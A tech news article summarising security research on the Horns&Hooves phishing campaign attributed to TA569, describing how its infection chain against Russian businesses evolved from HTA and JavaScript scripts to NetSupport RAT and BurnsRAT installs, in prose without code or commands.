Skip to content

Sophisticated Horns&Hooves malware targets Russian businesses

  • by
  • 3 min read

A malware campaign by the cyber gang TA569, named Horns&Hooves, has been targeting private users, retailers, and service businesses in Russia since March 2023. The campaign uses cleverly disguised malicious scripts in ZIP archives sent through phishing emails that appear to be legitimate business correspondence, with attachment names that mimic price requests, proposals, and refund claims.

The initial phase in April and May 2023 involved scripts with the HTA extension. These scripts, disguised as purchase requests, downloaded a decoy PNG document — a screenshot of the purchase table — and installed the legitimate yet exploited NetSupport Manager (NSM) remote administration tool, dubbed NetSupport RAT in this malicious context.

The attackers downloaded utilities like ‘bitsadmin,’ which they likely used to conceal payloads embedded within the file.

Version A attack chain. | Source: Securelist

By mid-May 2023, researchers discovered that the attackers transitioned to JavaScript (JS) files, embedding malicious code within legitimate-looking Next.js library scripts. The infection chain remained similar but introduced intermediate scripts and TXT decoy documents with meaningless text, signalling early testing of new bait formats.

Files were downloaded to directories such as %APPDATA%\EdgeCriticalUpdateService, demonstrating increased sophistication.

Another iteration in May 2023 swapped NetSupport RAT for BurnsRAT, leveraging DLL side-loading through legitimate tools like ‘Silverlight.Configuration.exe.’ The attackers incorporated RDP Wrapper, enabling enhanced remote desktop features.

This version notably introduced more plausible decoy documents generated via screenshot-to-text conversion.

Late May 2023 saw a significant rewrite to the BAT installation script. Instead of downloading individual payload components, this version used a PowerShell script to fetch and unpack an archive containing the NetSupport RAT. This streamlined approach hinted at the attackers’ efforts to reduce detection risks.

An example of malicious emails. | Source: Securelist

Researchers observed that starting in June 2023, the attackers embedded the entire NetSupport RAT ZIP archive within the malicious script, simplifying the infection chain. By September 2023, the payloads were split across multiple archives, and by early 2024, bait files had transitioned from plain text to more convincing PDF documents.

The campaign’s use of specific configuration keys and license files links it strongly to the TA569 group (Mustard Tempest or Gold Prelude). The Gateway Security Key (GSK) field confirmed the connection, indicating a shared infrastructure and operational framework.

Installing NetSupport RAT or Burns RAT provides attackers with remote access, as a stepping stone for further exploits. Observed activities include the deployment of stealers like Rhadamanthys and Meduza and ransomware. TA569 reportedly monetises access by selling compromised systems to other cybercriminal groups, amplifying potential risks to victims.

In the News: Revolut faces €700,000 lawsuit over fraudulent transaction

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>